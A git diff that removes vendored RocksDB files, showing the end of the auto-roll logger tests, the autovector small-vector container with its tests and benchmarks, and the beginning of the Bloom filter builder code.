-    dynamic_cast<AutoRollLogger*>(logger.get());
-  RollLogFileBySizeTest(auto_roll_logger, options.max_log_file_size,
-                        kSampleMessage + ":CreateLoggerFromOptions - both");
-  RollLogFileByTimeTest(&nse, auto_roll_logger, options.log_file_time_to_roll,
-                        kSampleMessage + ":CreateLoggerFromOptions - both");
-}
-
-TEST_F(AutoRollLoggerTest, LogFlushWhileRolling) {
-  DBOptions options;
-  shared_ptr<Logger> logger;
-
-  InitTestDb();
-  options.max_log_file_size = 1024 * 5;
-  ASSERT_OK(CreateLoggerFromOptions(kTestDir, options, &logger));
-  AutoRollLogger* auto_roll_logger =
-      dynamic_cast<AutoRollLogger*>(logger.get());
-  ASSERT_TRUE(auto_roll_logger);
-  rocksdb::port::Thread flush_thread;
-
-  // Notes:
-  // (1) Need to pin the old logger before beginning the roll, as rolling grabs
-  //     the mutex, which would prevent us from accessing the old logger. This
-  //     also marks flush_thread with AutoRollLogger::Flush:PinnedLogger.
-  // (2) Need to reset logger during PosixLogger::Flush() to exercise a race
-  //     condition case, which is executing the flush with the pinned (old)
-  //     logger after auto-roll logger has cut over to a new logger.
-  // (3) PosixLogger::Flush() happens in both threads but its SyncPoints only
-  //     are enabled in flush_thread (the one pinning the old logger).
-  rocksdb::SyncPoint::GetInstance()->LoadDependencyAndMarkers(
-      {{"AutoRollLogger::Flush:PinnedLogger",
-        "AutoRollLoggerTest::LogFlushWhileRolling:PreRollAndPostThreadInit"},
-       {"PosixLogger::Flush:Begin1",
-        "AutoRollLogger::ResetLogger:BeforeNewLogger"},
-       {"AutoRollLogger::ResetLogger:AfterNewLogger",
-        "PosixLogger::Flush:Begin2"}},
-      {{"AutoRollLogger::Flush:PinnedLogger", "PosixLogger::Flush:Begin1"},
-       {"AutoRollLogger::Flush:PinnedLogger", "PosixLogger::Flush:Begin2"}});
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  flush_thread = port::Thread ([&]() { auto_roll_logger->Flush(); });
-  TEST_SYNC_POINT(
-      "AutoRollLoggerTest::LogFlushWhileRolling:PreRollAndPostThreadInit");
-  RollLogFileBySizeTest(auto_roll_logger, options.max_log_file_size,
-                        kSampleMessage + ":LogFlushWhileRolling");
-  flush_thread.join();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-#endif  // OS_WIN
-
-TEST_F(AutoRollLoggerTest, InfoLogLevel) {
-  InitTestDb();
-
-  size_t log_size = 8192;
-  size_t log_lines = 0;
-  // an extra-scope to force the AutoRollLogger to flush the log file when it
-  // becomes out of scope.
-  {
-    AutoRollLogger logger(Env::Default(), kTestDir, "", log_size, 0);
-    for (int log_level = InfoLogLevel::HEADER_LEVEL;
-         log_level >= InfoLogLevel::DEBUG_LEVEL; log_level--) {
-      logger.SetInfoLogLevel((InfoLogLevel)log_level);
-      for (int log_type = InfoLogLevel::DEBUG_LEVEL;
-           log_type <= InfoLogLevel::HEADER_LEVEL; log_type++) {
-        // log messages with log level smaller than log_level will not be
-        // logged.
-        LogMessage((InfoLogLevel)log_type, &logger, kSampleMessage.c_str());
-      }
-      log_lines += InfoLogLevel::HEADER_LEVEL - log_level + 1;
-    }
-    for (int log_level = InfoLogLevel::HEADER_LEVEL;
-         log_level >= InfoLogLevel::DEBUG_LEVEL; log_level--) {
-      logger.SetInfoLogLevel((InfoLogLevel)log_level);
-
-      // again, messages with level smaller than log_level will not be logged.
-      ROCKS_LOG_HEADER(&logger, "%s", kSampleMessage.c_str());
-      ROCKS_LOG_DEBUG(&logger, "%s", kSampleMessage.c_str());
-      ROCKS_LOG_INFO(&logger, "%s", kSampleMessage.c_str());
-      ROCKS_LOG_WARN(&logger, "%s", kSampleMessage.c_str());
-      ROCKS_LOG_ERROR(&logger, "%s", kSampleMessage.c_str());
-      ROCKS_LOG_FATAL(&logger, "%s", kSampleMessage.c_str());
-      log_lines += InfoLogLevel::HEADER_LEVEL - log_level + 1;
-    }
-  }
-  std::ifstream inFile(AutoRollLoggerTest::kLogFile.c_str());
-  size_t lines = std::count(std::istreambuf_iterator<char>(inFile),
-                         std::istreambuf_iterator<char>(), '\n');
-  ASSERT_EQ(log_lines, lines);
-  inFile.close();
-}
-
-// Test the logger Header function for roll over logs
-// We expect the new logs creates as roll over to carry the headers specified
-static std::vector<std::string> GetOldFileNames(const std::string& path) {
-  std::vector<std::string> ret;
-
-  const std::string dirname = path.substr(/*start=*/0, path.find_last_of("/"));
-  const std::string fname = path.substr(path.find_last_of("/") + 1);
-
-  std::vector<std::string> children;
-  Env::Default()->GetChildren(dirname, &children);
-
-  // We know that the old log files are named [path]<something>
-  // Return all entities that match the pattern
-  for (auto& child : children) {
-    if (fname != child && child.find(fname) == 0) {
-      ret.push_back(dirname + "/" + child);
-    }
-  }
-
-  return ret;
-}
-
-// Return the number of lines where a given pattern was found in the file
-static size_t GetLinesCount(const std::string& fname,
-                            const std::string& pattern) {
-  std::stringstream ssbuf;
-  std::string line;
-  size_t count = 0;
-
-  std::ifstream inFile(fname.c_str());
-  ssbuf << inFile.rdbuf();
-
-  while (getline(ssbuf, line)) {
-    if (line.find(pattern) != std::string::npos) {
-      count++;
-    }
-  }
-
-  return count;
-}
-
-TEST_F(AutoRollLoggerTest, LogHeaderTest) {
-  static const size_t MAX_HEADERS = 10;
-  static const size_t LOG_MAX_SIZE = 1024 * 5;
-  static const std::string HEADER_STR = "Log header line";
-
-  // test_num == 0 -> standard call to Header()
-  // test_num == 1 -> call to Log() with InfoLogLevel::HEADER_LEVEL
-  for (int test_num = 0; test_num < 2; test_num++) {
-
-    InitTestDb();
-
-    AutoRollLogger logger(Env::Default(), kTestDir, /*db_log_dir=*/ "",
-                          LOG_MAX_SIZE, /*log_file_time_to_roll=*/ 0);
-
-    if (test_num == 0) {
-      // Log some headers explicitly using Header()
-      for (size_t i = 0; i < MAX_HEADERS; i++) {
-        Header(&logger, "%s %d", HEADER_STR.c_str(), i);
-      }
-    } else if (test_num == 1) {
-      // HEADER_LEVEL should make this behave like calling Header()
-      for (size_t i = 0; i < MAX_HEADERS; i++) {
-        ROCKS_LOG_HEADER(&logger, "%s %d", HEADER_STR.c_str(), i);
-      }
-    }
-
-    const std::string newfname = logger.TEST_log_fname();
-
-    // Log enough data to cause a roll over
-    int i = 0;
-    for (size_t iter = 0; iter < 2; iter++) {
-      while (logger.GetLogFileSize() < LOG_MAX_SIZE) {
-        Info(&logger, (kSampleMessage + ":LogHeaderTest line %d").c_str(), i);
-        ++i;
-      }
-
-      Info(&logger, "Rollover");
-    }
-
-    // Flush the log for the latest file
-    LogFlush(&logger);
-
-    const auto oldfiles = GetOldFileNames(newfname);
-
-    ASSERT_EQ(oldfiles.size(), (size_t) 2);
-
-    for (auto& oldfname : oldfiles) {
-      // verify that the files rolled over
-      ASSERT_NE(oldfname, newfname);
-      // verify that the old log contains all the header logs
-      ASSERT_EQ(GetLinesCount(oldfname, HEADER_STR), MAX_HEADERS);
-    }
-  }
-}
-
-TEST_F(AutoRollLoggerTest, LogFileExistence) {
-  rocksdb::DB* db;
-  rocksdb::Options options;
-#ifdef OS_WIN
-  // Replace all slashes in the path so windows CompSpec does not
-  // become confused
-  std::string testDir(kTestDir);
-  std::replace_if(testDir.begin(), testDir.end(),
-    [](char ch) { return ch == '/'; }, '\\');
-  std::string deleteCmd = "if exist " + testDir + " rd /s /q " + testDir;
-#else
-  std::string deleteCmd = "rm -rf " + kTestDir;
-#endif
-  ASSERT_EQ(system(deleteCmd.c_str()), 0);
-  options.max_log_file_size = 100 * 1024 * 1024;
-  options.create_if_missing = true;
-  ASSERT_OK(rocksdb::DB::Open(options, kTestDir, &db));
-  ASSERT_OK(default_env->FileExists(kLogFile));
-  delete db;
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr,
-          "SKIPPED as AutoRollLogger is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/util/autovector.h b/thirdparty/rocksdb/util/autovector.h
deleted file mode 100644
index b5c8471..0000000
--- a/thirdparty/rocksdb/util/autovector.h
+++ /dev/null
@@ -1,338 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <algorithm>
-#include <cassert>
-#include <initializer_list>
-#include <iterator>
-#include <stdexcept>
-#include <vector>
-
-namespace rocksdb {
-
-#ifdef ROCKSDB_LITE
-template <class T, size_t kSize = 8>
-class autovector : public std::vector<T> {
-  using std::vector<T>::vector;
-};
-#else
-// A vector that leverages pre-allocated stack-based array to achieve better
-// performance for array with small amount of items.
-//
-// The interface resembles that of vector, but with less features since we aim
-// to solve the problem that we have in hand, rather than implementing a
-// full-fledged generic container.
-//
-// Currently we don't support:
-//  * reserve()/shrink_to_fit()
-//     If used correctly, in most cases, people should not touch the
-//     underlying vector at all.
-//  * random insert()/erase(), please only use push_back()/pop_back().
-//  * No move/swap operations. Each autovector instance has a
-//     stack-allocated array and if we want support move/swap operations, we
-//     need to copy the arrays other than just swapping the pointers. In this
-//     case we'll just explicitly forbid these operations since they may
-//     lead users to make false assumption by thinking they are inexpensive
-//     operations.
-//
-// Naming style of public methods almost follows that of the STL's.
-template <class T, size_t kSize = 8>
-class autovector {
- public:
-  // General STL-style container member types.
-  typedef T value_type;
-  typedef typename std::vector<T>::difference_type difference_type;
-  typedef typename std::vector<T>::size_type size_type;
-  typedef value_type& reference;
-  typedef const value_type& const_reference;
-  typedef value_type* pointer;
-  typedef const value_type* const_pointer;
-
-  // This class is the base for regular/const iterator
-  template <class TAutoVector, class TValueType>
-  class iterator_impl {
-   public:
-    // -- iterator traits
-    typedef iterator_impl<TAutoVector, TValueType> self_type;
-    typedef TValueType value_type;
-    typedef TValueType& reference;
-    typedef TValueType* pointer;
-    typedef typename TAutoVector::difference_type difference_type;
-    typedef std::random_access_iterator_tag iterator_category;
-
-    iterator_impl(TAutoVector* vect, size_t index)
-        : vect_(vect), index_(index) {};
-    iterator_impl(const iterator_impl&) = default;
-    ~iterator_impl() {}
-    iterator_impl& operator=(const iterator_impl&) = default;
-
-    // -- Advancement
-    // ++iterator
-    self_type& operator++() {
-      ++index_;
-      return *this;
-    }
-
-    // iterator++
-    self_type operator++(int) {
-      auto old = *this;
-      ++index_;
-      return old;
-    }
-
-    // --iterator
-    self_type& operator--() {
-      --index_;
-      return *this;
-    }
-
-    // iterator--
-    self_type operator--(int) {
-      auto old = *this;
-      --index_;
-      return old;
-    }
-
-    self_type operator-(difference_type len) const {
-      return self_type(vect_, index_ - len);
-    }
-
-    difference_type operator-(const self_type& other) const {
-      assert(vect_ == other.vect_);
-      return index_ - other.index_;
-    }
-
-    self_type operator+(difference_type len) const {
-      return self_type(vect_, index_ + len);
-    }
-
-    self_type& operator+=(difference_type len) {
-      index_ += len;
-      return *this;
-    }
-
-    self_type& operator-=(difference_type len) {
-      index_ -= len;
-      return *this;
-    }
-
-    // -- Reference
-    reference operator*() {
-      assert(vect_->size() >= index_);
-      return (*vect_)[index_];
-    }
-
-    const_reference operator*() const {
-      assert(vect_->size() >= index_);
-      return (*vect_)[index_];
-    }
-
-    pointer operator->() {
-      assert(vect_->size() >= index_);
-      return &(*vect_)[index_];
-    }
-
-    const_pointer operator->() const {
-      assert(vect_->size() >= index_);
-      return &(*vect_)[index_];
-    }
-
-
-    // -- Logical Operators
-    bool operator==(const self_type& other) const {
-      assert(vect_ == other.vect_);
-      return index_ == other.index_;
-    }
-
-    bool operator!=(const self_type& other) const { return !(*this == other); }
-
-    bool operator>(const self_type& other) const {
-      assert(vect_ == other.vect_);
-      return index_ > other.index_;
-    }
-
-    bool operator<(const self_type& other) const {
-      assert(vect_ == other.vect_);
-      return index_ < other.index_;
-    }
-
-    bool operator>=(const self_type& other) const {
-      assert(vect_ == other.vect_);
-      return index_ >= other.index_;
-    }
-
-    bool operator<=(const self_type& other) const {
-      assert(vect_ == other.vect_);
-      return index_ <= other.index_;
-    }
-
-   private:
-    TAutoVector* vect_ = nullptr;
-    size_t index_ = 0;
-  };
-
-  typedef iterator_impl<autovector, value_type> iterator;
-  typedef iterator_impl<const autovector, const value_type> const_iterator;
-  typedef std::reverse_iterator<iterator> reverse_iterator;
-  typedef std::reverse_iterator<const_iterator> const_reverse_iterator;
-
-  autovector() = default;
-
-  autovector(std::initializer_list<T> init_list) {
-    for (const T& item : init_list) {
-      push_back(item);
-    }
-  }
-
-  ~autovector() = default;
-
-  // -- Immutable operations
-  // Indicate if all data resides in in-stack data structure.
-  bool only_in_stack() const {
-    // If no element was inserted at all, the vector's capacity will be `0`.
-    return vect_.capacity() == 0;
-  }
-
-  size_type size() const { return num_stack_items_ + vect_.size(); }
-
-  // resize does not guarantee anything about the contents of the newly
-  // available elements
-  void resize(size_type n) {
-    if (n > kSize) {
-      vect_.resize(n - kSize);
-      num_stack_items_ = kSize;
-    } else {
-      vect_.clear();
-      num_stack_items_ = n;
-    }
-  }
-
-  bool empty() const { return size() == 0; }
-
-  const_reference operator[](size_type n) const {
-    assert(n < size());
-    return n < kSize ? values_[n] : vect_[n - kSize];
-  }
-
-  reference operator[](size_type n) {
-    assert(n < size());
-    return n < kSize ? values_[n] : vect_[n - kSize];
-  }
-
-  const_reference at(size_type n) const {
-    assert(n < size());
-    return (*this)[n];
-  }
-
-  reference at(size_type n) {
-    assert(n < size());
-    return (*this)[n];
-  }
-
-  reference front() {
-    assert(!empty());
-    return *begin();
-  }
-
-  const_reference front() const {
-    assert(!empty());
-    return *begin();
-  }
-
-  reference back() {
-    assert(!empty());
-    return *(end() - 1);
-  }
-
-  const_reference back() const {
-    assert(!empty());
-    return *(end() - 1);
-  }
-
-  // -- Mutable Operations
-  void push_back(T&& item) {
-    if (num_stack_items_ < kSize) {
-      values_[num_stack_items_++] = std::move(item);
-    } else {
-      vect_.push_back(item);
-    }
-  }
-
-  void push_back(const T& item) {
-    if (num_stack_items_ < kSize) {
-      values_[num_stack_items_++] = item;
-    } else {
-      vect_.push_back(item);
-    }
-  }
-
-  template <class... Args>
-  void emplace_back(Args&&... args) {
-    push_back(value_type(args...));
-  }
-
-  void pop_back() {
-    assert(!empty());
-    if (!vect_.empty()) {
-      vect_.pop_back();
-    } else {
-      --num_stack_items_;
-    }
-  }
-
-  void clear() {
-    num_stack_items_ = 0;
-    vect_.clear();
-  }
-
-  // -- Copy and Assignment
-  autovector& assign(const autovector& other);
-
-  autovector(const autovector& other) { assign(other); }
-
-  autovector& operator=(const autovector& other) { return assign(other); }
-
-  // -- Iterator Operations
-  iterator begin() { return iterator(this, 0); }
-
-  const_iterator begin() const { return const_iterator(this, 0); }
-
-  iterator end() { return iterator(this, this->size()); }
-
-  const_iterator end() const { return const_iterator(this, this->size()); }
-
-  reverse_iterator rbegin() { return reverse_iterator(end()); }
-
-  const_reverse_iterator rbegin() const {
-    return const_reverse_iterator(end());
-  }
-
-  reverse_iterator rend() { return reverse_iterator(begin()); }
-
-  const_reverse_iterator rend() const {
-    return const_reverse_iterator(begin());
-  }
-
- private:
-  size_type num_stack_items_ = 0;  // current number of items
-  value_type values_[kSize];       // the first `kSize` items
-  // used only if there are more than `kSize` items.
-  std::vector<T> vect_;
-};
-
-template <class T, size_t kSize>
-autovector<T, kSize>& autovector<T, kSize>::assign(const autovector& other) {
-  // copy the internal vector
-  vect_.assign(other.vect_.begin(), other.vect_.end());
-
-  // copy array
-  num_stack_items_ = other.num_stack_items_;
-  std::copy(other.values_, other.values_ + num_stack_items_, values_);
-
-  return *this;
-}
-#endif  // ROCKSDB_LITE
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/autovector_test.cc b/thirdparty/rocksdb/util/autovector_test.cc
deleted file mode 100644
index 2d7bcea..0000000
--- a/thirdparty/rocksdb/util/autovector_test.cc
+++ /dev/null
@@ -1,327 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <atomic>
-#include <iostream>
-#include <string>
-#include <utility>
-
-#include "rocksdb/env.h"
-#include "util/autovector.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-using std::cout;
-using std::endl;
-
-namespace rocksdb {
-
-class AutoVectorTest : public testing::Test {};
-const unsigned long kSize = 8;
-
-namespace {
-template <class T>
-void AssertAutoVectorOnlyInStack(autovector<T, kSize>* vec, bool result) {
-#ifndef ROCKSDB_LITE
-  ASSERT_EQ(vec->only_in_stack(), result);
-#endif  // !ROCKSDB_LITE
-}
-}  // namespace
-
-TEST_F(AutoVectorTest, PushBackAndPopBack) {
-  autovector<size_t, kSize> vec;
-  ASSERT_TRUE(vec.empty());
-  ASSERT_EQ(0ul, vec.size());
-
-  for (size_t i = 0; i < 1000 * kSize; ++i) {
-    vec.push_back(i);
-    ASSERT_TRUE(!vec.empty());
-    if (i < kSize) {
-      AssertAutoVectorOnlyInStack(&vec, true);
-    } else {
-      AssertAutoVectorOnlyInStack(&vec, false);
-    }
-    ASSERT_EQ(i + 1, vec.size());
-    ASSERT_EQ(i, vec[i]);
-    ASSERT_EQ(i, vec.at(i));
-  }
-
-  size_t size = vec.size();
-  while (size != 0) {
-    vec.pop_back();
-    // will always be in heap
-    AssertAutoVectorOnlyInStack(&vec, false);
-    ASSERT_EQ(--size, vec.size());
-  }
-
-  ASSERT_TRUE(vec.empty());
-}
-
-TEST_F(AutoVectorTest, EmplaceBack) {
-  typedef std::pair<size_t, std::string> ValType;
-  autovector<ValType, kSize> vec;
-
-  for (size_t i = 0; i < 1000 * kSize; ++i) {
-    vec.emplace_back(i, ToString(i + 123));
-    ASSERT_TRUE(!vec.empty());
-    if (i < kSize) {
-      AssertAutoVectorOnlyInStack(&vec, true);
-    } else {
-      AssertAutoVectorOnlyInStack(&vec, false);
-    }
-
-    ASSERT_EQ(i + 1, vec.size());
-    ASSERT_EQ(i, vec[i].first);
-    ASSERT_EQ(ToString(i + 123), vec[i].second);
-  }
-
-  vec.clear();
-  ASSERT_TRUE(vec.empty());
-  AssertAutoVectorOnlyInStack(&vec, false);
-}
-
-TEST_F(AutoVectorTest, Resize) {
-  autovector<size_t, kSize> vec;
-
-  vec.resize(kSize);
-  AssertAutoVectorOnlyInStack(&vec, true);
-  for (size_t i = 0; i < kSize; ++i) {
-    vec[i] = i;
-  }
-
-  vec.resize(kSize * 2);
-  AssertAutoVectorOnlyInStack(&vec, false);
-  for (size_t i = 0; i < kSize; ++i) {
-    ASSERT_EQ(vec[i], i);
-  }
-  for (size_t i = 0; i < kSize; ++i) {
-    vec[i + kSize] = i;
-  }
-
-  vec.resize(1);
-  ASSERT_EQ(1U, vec.size());
-}
-
-namespace {
-void AssertEqual(
-    const autovector<size_t, kSize>& a, const autovector<size_t, kSize>& b) {
-  ASSERT_EQ(a.size(), b.size());
-  ASSERT_EQ(a.empty(), b.empty());
-#ifndef ROCKSDB_LITE
-  ASSERT_EQ(a.only_in_stack(), b.only_in_stack());
-#endif  // !ROCKSDB_LITE
-  for (size_t i = 0; i < a.size(); ++i) {
-    ASSERT_EQ(a[i], b[i]);
-  }
-}
-}  // namespace
-
-TEST_F(AutoVectorTest, CopyAndAssignment) {
-  // Test both heap-allocated and stack-allocated cases.
-  for (auto size : { kSize / 2, kSize * 1000 }) {
-    autovector<size_t, kSize> vec;
-    for (size_t i = 0; i < size; ++i) {
-      vec.push_back(i);
-    }
-
-    {
-      autovector<size_t, kSize> other;
-      other = vec;
-      AssertEqual(other, vec);
-    }
-
-    {
-      autovector<size_t, kSize> other(vec);
-      AssertEqual(other, vec);
-    }
-  }
-}
-
-TEST_F(AutoVectorTest, Iterators) {
-  autovector<std::string, kSize> vec;
-  for (size_t i = 0; i < kSize * 1000; ++i) {
-    vec.push_back(ToString(i));
-  }
-
-  // basic operator test
-  ASSERT_EQ(vec.front(), *vec.begin());
-  ASSERT_EQ(vec.back(), *(vec.end() - 1));
-  ASSERT_TRUE(vec.begin() < vec.end());
-
-  // non-const iterator
-  size_t index = 0;
-  for (const auto& item : vec) {
-    ASSERT_EQ(vec[index++], item);
-  }
-
-  index = vec.size() - 1;
-  for (auto pos = vec.rbegin(); pos != vec.rend(); ++pos) {
-    ASSERT_EQ(vec[index--], *pos);
-  }
-
-  // const iterator
-  const auto& cvec = vec;
-  index = 0;
-  for (const auto& item : cvec) {
-    ASSERT_EQ(cvec[index++], item);
-  }
-
-  index = vec.size() - 1;
-  for (auto pos = cvec.rbegin(); pos != cvec.rend(); ++pos) {
-    ASSERT_EQ(cvec[index--], *pos);
-  }
-
-  // forward and backward
-  auto pos = vec.begin();
-  while (pos != vec.end()) {
-    auto old_val = *pos;
-    auto old = pos++;
-    // HACK: make sure -> works
-    ASSERT_TRUE(!old->empty());
-    ASSERT_EQ(old_val, *old);
-    ASSERT_TRUE(pos == vec.end() || old_val != *pos);
-  }
-
-  pos = vec.begin();
-  for (size_t i = 0; i < vec.size(); i += 2) {
-    // Cannot use ASSERT_EQ since that macro depends on iostream serialization
-    ASSERT_TRUE(pos + 2 - 2 == pos);
-    pos += 2;
-    ASSERT_TRUE(pos >= vec.begin());
-    ASSERT_TRUE(pos <= vec.end());
-
-    size_t diff = static_cast<size_t>(pos - vec.begin());
-    ASSERT_EQ(i + 2, diff);
-  }
-}
-
-namespace {
-std::vector<std::string> GetTestKeys(size_t size) {
-  std::vector<std::string> keys;
-  keys.resize(size);
-
-  int index = 0;
-  for (auto& key : keys) {
-    key = "item-" + rocksdb::ToString(index++);
-  }
-  return keys;
-}
-}  // namespace
-
-template <class TVector>
-void BenchmarkVectorCreationAndInsertion(
-    std::string name, size_t ops, size_t item_size,
-    const std::vector<typename TVector::value_type>& items) {
-  auto env = Env::Default();
-
-  int index = 0;
-  auto start_time = env->NowNanos();
-  auto ops_remaining = ops;
-  while(ops_remaining--) {
-    TVector v;
-    for (size_t i = 0; i < item_size; ++i) {
-      v.push_back(items[index++]);
-    }
-  }
-  auto elapsed = env->NowNanos() - start_time;
-  cout << "created " << ops << " " << name << " instances:\n\t"
-       << "each was inserted with " << item_size << " elements\n\t"
-       << "total time elapsed: " << elapsed << " (ns)" << endl;
-}
-
-template <class TVector>
-size_t BenchmarkSequenceAccess(std::string name, size_t ops, size_t elem_size) {
-  TVector v;
-  for (const auto& item : GetTestKeys(elem_size)) {
-    v.push_back(item);
-  }
-  auto env = Env::Default();
-
-  auto ops_remaining = ops;
-  auto start_time = env->NowNanos();
-  size_t total = 0;
-  while (ops_remaining--) {
-    auto end = v.end();
-    for (auto pos = v.begin(); pos != end; ++pos) {
-      total += pos->size();
-    }
-  }
-  auto elapsed = env->NowNanos() - start_time;
-  cout << "performed " << ops << " sequence access against " << name << "\n\t"
-       << "size: " << elem_size << "\n\t"
-       << "total time elapsed: " << elapsed << " (ns)" << endl;
-  // HACK avoid compiler's optimization to ignore total
-  return total;
-}
-
-// This test case only reports the performance between std::vector<std::string>
-// and autovector<std::string>. We chose string for comparison because in most
-// of our use cases we used std::vector<std::string>.
-TEST_F(AutoVectorTest, PerfBench) {
-  // We run same operations for kOps times in order to get a more fair result.
-  size_t kOps = 100000;
-
-  // Creation and insertion test
-  // Test the case when there is:
-  //  * no element inserted: internal array of std::vector may not really get
-  //    initialize.
-  //  * one element inserted: internal array of std::vector must have
-  //    initialized.
-  //  * kSize elements inserted. This shows the most time we'll spend if we
-  //    keep everything in stack.
-  //  * 2 * kSize elements inserted. The internal vector of
-  //    autovector must have been initialized.
-  cout << "=====================================================" << endl;
-  cout << "Creation and Insertion Test (value type: std::string)" << endl;
-  cout << "=====================================================" << endl;
-
-  // pre-generated unique keys
-  auto string_keys = GetTestKeys(kOps * 2 * kSize);
-  for (auto insertions : { 0ul, 1ul, kSize / 2, kSize, 2 * kSize }) {
-    BenchmarkVectorCreationAndInsertion<std::vector<std::string>>(
-        "std::vector<std::string>", kOps, insertions, string_keys);
-    BenchmarkVectorCreationAndInsertion<autovector<std::string, kSize>>(
-        "autovector<std::string>", kOps, insertions, string_keys);
-    cout << "-----------------------------------" << endl;
-  }
-
-  cout << "=====================================================" << endl;
-  cout << "Creation and Insertion Test (value type: uint64_t)" << endl;
-  cout << "=====================================================" << endl;
-
-  // pre-generated unique keys
-  std::vector<uint64_t> int_keys(kOps * 2 * kSize);
-  for (size_t i = 0; i < kOps * 2 * kSize; ++i) {
-    int_keys[i] = i;
-  }
-  for (auto insertions : { 0ul, 1ul, kSize / 2, kSize, 2 * kSize }) {
-    BenchmarkVectorCreationAndInsertion<std::vector<uint64_t>>(
-        "std::vector<uint64_t>", kOps, insertions, int_keys);
-    BenchmarkVectorCreationAndInsertion<autovector<uint64_t, kSize>>(
-      "autovector<uint64_t>", kOps, insertions, int_keys
-    );
-    cout << "-----------------------------------" << endl;
-  }
-
-  // Sequence Access Test
-  cout << "=====================================================" << endl;
-  cout << "Sequence Access Test" << endl;
-  cout << "=====================================================" << endl;
-  for (auto elem_size : { kSize / 2, kSize, 2 * kSize }) {
-    BenchmarkSequenceAccess<std::vector<std::string>>("std::vector", kOps,
-                                                      elem_size);
-    BenchmarkSequenceAccess<autovector<std::string, kSize>>("autovector", kOps,
-                                                            elem_size);
-    cout << "-----------------------------------" << endl;
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/bloom.cc b/thirdparty/rocksdb/util/bloom.cc
deleted file mode 100644
index 9af17f8..0000000
--- a/thirdparty/rocksdb/util/bloom.cc
+++ /dev/null
@@ -1,353 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/filter_policy.h"
-
-#include "rocksdb/slice.h"
-#include "table/block_based_filter_block.h"
-#include "table/full_filter_bits_builder.h"
-#include "table/full_filter_block.h"
-#include "util/coding.h"
-#include "util/hash.h"
-
-namespace rocksdb {
-
-class BlockBasedFilterBlockBuilder;
-class FullFilterBlockBuilder;
-
-FullFilterBitsBuilder::FullFilterBitsBuilder(const size_t bits_per_key,
-                                             const size_t num_probes)
-    : bits_per_key_(bits_per_key), num_probes_(num_probes) {
-  assert(bits_per_key_);
-  }
-
-  FullFilterBitsBuilder::~FullFilterBitsBuilder() {}
-
-  void FullFilterBitsBuilder::AddKey(const Slice& key) {
-    uint32_t hash = BloomHash(key);
-    if (hash_entries_.size() == 0 || hash != hash_entries_.back()) {
-      hash_entries_.push_back(hash);
-    }
-  }
-
-  Slice FullFilterBitsBuilder::Finish(std::unique_ptr<const char[]>* buf) {
-    uint32_t total_bits, num_lines;
-    char* data = ReserveSpace(static_cast<int>(hash_entries_.size()),
-                              &total_bits, &num_lines);
-    assert(data);
-
-    if (total_bits != 0 && num_lines != 0) {
-      for (auto h : hash_entries_) {
-        AddHash(h, data, num_lines, total_bits);
-      }
-    }
-    data[total_bits/8] = static_cast<char>(num_probes_);
-    EncodeFixed32(data + total_bits/8 + 1, static_cast<uint32_t>(num_lines));
-
-    const char* const_data = data;
-    buf->reset(const_data);
-    hash_entries_.clear();
-
-    return Slice(data, total_bits / 8 + 5);
-  }
-
-uint32_t FullFilterBitsBuilder::GetTotalBitsForLocality(uint32_t total_bits) {
-  uint32_t num_lines =
-      (total_bits + CACHE_LINE_SIZE * 8 - 1) / (CACHE_LINE_SIZE * 8);
-
-  // Make num_lines an odd number to make sure more bits are involved
-  // when determining which block.
-  if (num_lines % 2 == 0) {
-    num_lines++;
-  }
-  return num_lines * (CACHE_LINE_SIZE * 8);
-}
-
-uint32_t FullFilterBitsBuilder::CalculateSpace(const int num_entry,
-                                               uint32_t* total_bits,
-                                               uint32_t* num_lines) {
-  assert(bits_per_key_);
-  if (num_entry != 0) {
-    uint32_t total_bits_tmp = num_entry * static_cast<uint32_t>(bits_per_key_);
-
-    *total_bits = GetTotalBitsForLocality(total_bits_tmp);
-    *num_lines = *total_bits / (CACHE_LINE_SIZE * 8);
-    assert(*total_bits > 0 && *total_bits % 8 == 0);
-  } else {
-    // filter is empty, just leave space for metadata
-    *total_bits = 0;
-    *num_lines = 0;
-  }
-
-  // Reserve space for Filter
-  uint32_t sz = *total_bits / 8;
-  sz += 5;  // 4 bytes for num_lines, 1 byte for num_probes
-  return sz;
-}
-
-char* FullFilterBitsBuilder::ReserveSpace(const int num_entry,
-                                          uint32_t* total_bits,
-                                          uint32_t* num_lines) {
-  uint32_t sz = CalculateSpace(num_entry, total_bits, num_lines);
-  char* data = new char[sz];
-  memset(data, 0, sz);
-  return data;
-}
-
-int FullFilterBitsBuilder::CalculateNumEntry(const uint32_t space) {
-  assert(bits_per_key_);
-  assert(space > 0);
-  uint32_t dont_care1, dont_care2;
-  int high = (int) (space * 8 / bits_per_key_ + 1);
-  int low = 1;
-  int n = high;
-  for (; n >= low; n--) {
-    uint32_t sz = CalculateSpace(n, &dont_care1, &dont_care2);
-    if (sz <= space) {
-      break;
-    }
-  }
-  assert(n < high);  // High should be an overestimation
-  return n;
